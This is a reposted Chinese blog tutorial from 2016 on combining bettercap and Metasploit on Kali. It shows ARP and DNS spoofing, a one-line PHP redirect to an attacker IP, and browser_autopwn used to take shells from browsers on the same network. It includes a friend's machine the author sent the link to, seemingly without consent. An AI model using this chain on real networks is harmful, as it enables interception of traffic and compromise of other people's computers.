Linux_Kali

bettercap+metasploit 实战操作

字号+ 作者:雪花 来源:转载 2016-11-27 15:14 我要评论( )

测试主机:kali 2016.2 工具:bettercap、metasploit、dnsspoof、armitage 前期准备工作 在kali下并没有集成bettercap,所以我们需要自己安装 安装完成 启动postgr......

测试主机:kali 2016.2
工具:bettercap、metasploit、dnsspoof、armitage
 
前期准备工作
在kali下并没有集成bettercap,所以我们需要自己安装
bettercap+metasploit 实战操作 - sn0w - 雪花 - root@sn0w.top
 安装完成
bettercap+metasploit 实战操作 - sn0w - 雪花 - root@sn0w.top
 启动postgresql服务
bettercap+metasploit 实战操作 - sn0w - 雪花 - root@sn0w.top
 metasploit数据库初始化bettercap+metasploit 实战操作 - sn0w - 雪花 - root@sn0w.top
 查看数据库链接状态,如果这里显示数据库未连接可以参考:传送门 连接数据库
bettercap+metasploit 实战操作 - sn0w - 雪花 - root@sn0w.top
 启动armitage(关于armitage
bettercap+metasploit 实战操作 - sn0w - 雪花 - root@sn0w.top
 准备一个hosts文件(用于DNS欺骗)bettercap+metasploit 实战操作 - sn0w - 雪花 - root@sn0w.top
更改:刚才试了一下,在hosts文件中加上端口号好像会出现一些意料不到的问题。这里我们换个思路,直接到ip地址不加端口号,然后开启apache服务,然后将下面的代码保存为index.php放在根目录下(/var/www/html/)

<?php header("Location:http://10.167.33.1:8080"); ?>

这样在DNS欺骗后会跳到指定ip,然后在通过php重定向到我们的payload。
还有一种方法是在下边启动浏览器自动攻击插件时,将端口号直接改成80端口。
 
/**************************************zhun bei wan cheng *****************************************/
 
 
启动浏览器自动攻击模块:browser_autopwn
 
bettercap+metasploit 实战操作 - sn0w - 雪花 - root@sn0w.top
 等待他将所有payload加载完成
bettercap+metasploit 实战操作 - sn0w - 雪花 - root@sn0w.top
 arp攻击(执行:bettercap -X)
bettercap+metasploit 实战操作 - sn0w - 雪花 - root@sn0w.top
 DNS欺骗(忘了截图 图是后补的 所以参数有点不一样)
bettercap+metasploit 实战操作 - sn0w - 雪花 - root@sn0w.top
现在我们就等鱼上钩,现在同一网关下的主机不管打开什么URL都会解析到我们的URL中,当他打开我们的URL时,程序会自动验证哪个payload可用
 bettercap+metasploit 实战操作 - sn0w - 雪花 - root@sn0w.top
 我 们的DNS欺骗只对同一网关下的主机有效,但是我们共计用的URL只要能访问到我们的地址就可以。下图可以看到有两台win10主机为arp+dns欺骗 过来的,而安卓两台win7是我将这个URL发给了我的朋友,当然他也是在内网中的。如果我们需要攻击一台公网中的主机可以参考公网的Shell如何返回到内网的Kali 。最终有一台win7的浏览器成功运行了我们的payload并返回了shell。
bettercap+metasploit 实战操作 - sn0w - 雪花 - root@sn0w.top
 
bettercap+metasploit 实战操作 - sn0w - 雪花 - root@sn0w.top
 
bettercap+metasploit 实战操作 - sn0w - 雪花 - root@sn0w.top

本文来自: 蜗蜗侠's Blog-关注网络安全 http://blog.icxun.cn/hack/Linux_Kali/326.html

1.本站遵循行业规范,任何转载的稿件都会明确标注作者和来源;2.本站的原创文章,请转载时务必注明文章作者和来源,不尊重原创的行为我们将追究责任;3.作者投稿可能会经我们编辑修改或补充。

相关文章
网友点评
暂时未开启评论功能~